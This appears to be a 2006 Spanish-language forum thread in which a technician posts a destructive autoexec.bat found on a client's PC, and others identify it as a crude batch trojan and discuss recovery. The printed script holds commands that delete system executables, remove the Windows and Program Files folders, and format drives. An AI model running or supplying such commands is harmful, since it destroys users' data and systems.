Identificarte

Versión Completa : autoexec bastante raro

Sponsored links
.

fbarreiro
marzo 12, 2006, 07:56
Me cae un cliente con que ya no le entra al windows, veo que era un PC viejito con win 98 y efectivamente no le entraba el win98, cuando mire encotre este autoexec.bat y casi me da un ataque de risa.

@ECHO OFF
Del C:\Windows\*.exe
Del C:\WinNt\*.exe
Del C:\Windows\Help\*.hlp
Del C:\Windows\Help\*.CHM
Format C: /u /v:Reactor
Format /y C:
Format C: /y
C:
CD\
Deltree /y Windows
Deltree /y"Program files"
Format /y A:
Alguien que me diga de donde pudo haber salido esto.

Muchas gracias

|Nc| Camus
marzo 13, 2006, 09:42
Huy... 8| Eso es un especimen de un virus bat que literalmente jode a Windows.... puras mañas de un tipico lammer....

Salu2

alcas32
marzo 13, 2006, 10:07
ja,ja,ja pacho, porqué no me llamó yo hubiese pagado entrada para ver esto, ja,ja,ja, se parece mucho al virus gallego,

ja,ja,ja.

Alex

HOHO
marzo 13, 2006, 11:35
se parece mucho al virus gallego

A este???

http://usuario.cicese.mx/~loyasa/bio/humor/virusga.htm

davidMHe
marzo 13, 2006, 12:44
Ese virus da hasta risa, es que es evidente lo que hace....

Jeanny
marzo 13, 2006, 01:16
Ja, ja si un virus gallego eso es.

Zafnat-panea
marzo 13, 2006, 01:22
No es más que un virus hecho en el Notepad y guardado como un .Bat de esta forma basta darle doble clic al icono y boilà
Tambien se puede iniciar sis es invocado desde el sysedit en una de las lineas del system.ini
De todas formas es obra de un lammer lo mínimo que pudo haber hecho era encriptar las lineas de texto.. pero bueno quiza esta aprendiendo.

|Nc| Camus
marzo 13, 2006, 03:33
jajajaja Mortal eso del virus gallego..... :reir:

Salu2

HOHO
marzo 14, 2006, 06:10
Hay una cosa que no entiendo...

Si supuestamente el disco duro se formateó... ¿Cómo pudo ver el archivo autoexec?

KERBEROS
marzo 14, 2006, 06:21
Eso no es un virus. Es un Archivo de procesamiento por lotes. El que lo hizo si esta muy desocupao!

|Nc| Camus
marzo 14, 2006, 07:17
Pues si este de BVF no tiene mucho por que no infecta ni se autocopia ni na'.....

salu2

fbarreiro
marzo 15, 2006, 11:01

Si supuestamente el disco duro se formateó... ¿Cómo pudo ver el archivo autoexec?
Es que el usuario le parecio muy raro que le pidiera permiso para formatear el C: y entonces apago y me lo trajo.

fbarreiro
marzo 15, 2006, 11:01

Si supuestamente el disco duro se formateó... ¿Cómo pudo ver el archivo autoexec? Es que el usuario le parecio muy raro que le pidiera permiso para formatear el C: y entonces apago y me lo trajo. pero el daño de borrar carpetas ya estaba hecho.

Perdon, pero se me fue doble.
offtopic Como hago para borrar un post que ya se me fue por error como el anterior, yo se como editarlos, pero no como borrarlos..

psykho
marzo 21, 2006, 11:30
y por que no recuepera la tabla de particion.. por que si lo apago.. deja por lo menos salvar lo importante...
que disque virus mas backano... esta muuuy comico...

HOHO
marzo 21, 2006, 11:42
Como habían dicho anteriormente, no es un virus, porque no se copia a sí mismo, solo es un troyano....

Muy sencillo pero un poco dañino =) ... preguntele al dueño si alguien que tenía acceso al equipo le guardaba un poco de rencor :P

fbarreiro
marzo 21, 2006, 11:58
Si, al parecer fue un sobrino con unos amigos que le estubieron manipulando el PC, creo que querian instalar un juego viejito.

Por el lado de la recuperación, conecte el disco como esclavo en el mio y le copie "mis documentos" y quedo muy agradecido, luego no fue sino reinstalar win98. y listo.

|Nc| Camus
marzo 22, 2006, 08:38
Si, al parecer fue un sobrino con unos amigos que le estubieron manipulando el PC, creo que querian instalar un juego viejito.

offtopic Hombe una pela es lo que les doy y no le vuelvo a dar la liga :p

fbarreiro
octubre 9, 2006, 08:25
Pues si muchachos, revivo este foro ya que se me presento otro equipo con este tipo de ataque.
Mi cliente tiene wXP y cuando iniciaba el pc le salia una ventana de comandos en la que le pedia confirmación para formatear el C:. Solo fue borrar el autoexec.bat de la raiz de c: y listo.
Aunque es fácil de solucionar, mi inquietud es: Si alguien tiene info de este ataque, porque pasa, o como se activa este problemita.

HOHO
octubre 9, 2006, 10:34
fbarreiro, tengo una pregunta: ¿no fue necesario volver a instalar windows xp en este último caso?

Porque según el código que usted expuso, primero se borran todos los .exe y luego si pregunta por si desea formatear c:.

fbarreiro
octubre 9, 2006, 02:18
Pues no, primero saca un mensaje de no encontrar archivos, luego de acceso denegado, luego que es una partición ntfs y luego lo del formateo, y en este punto el usuario cerraba la ventana.

Creo que si alcanzo a borrar unos archivos exe y quien sabe que otras cosas, pero esta funcionando, algo lento pero funcionando, despues sera formatear el pc.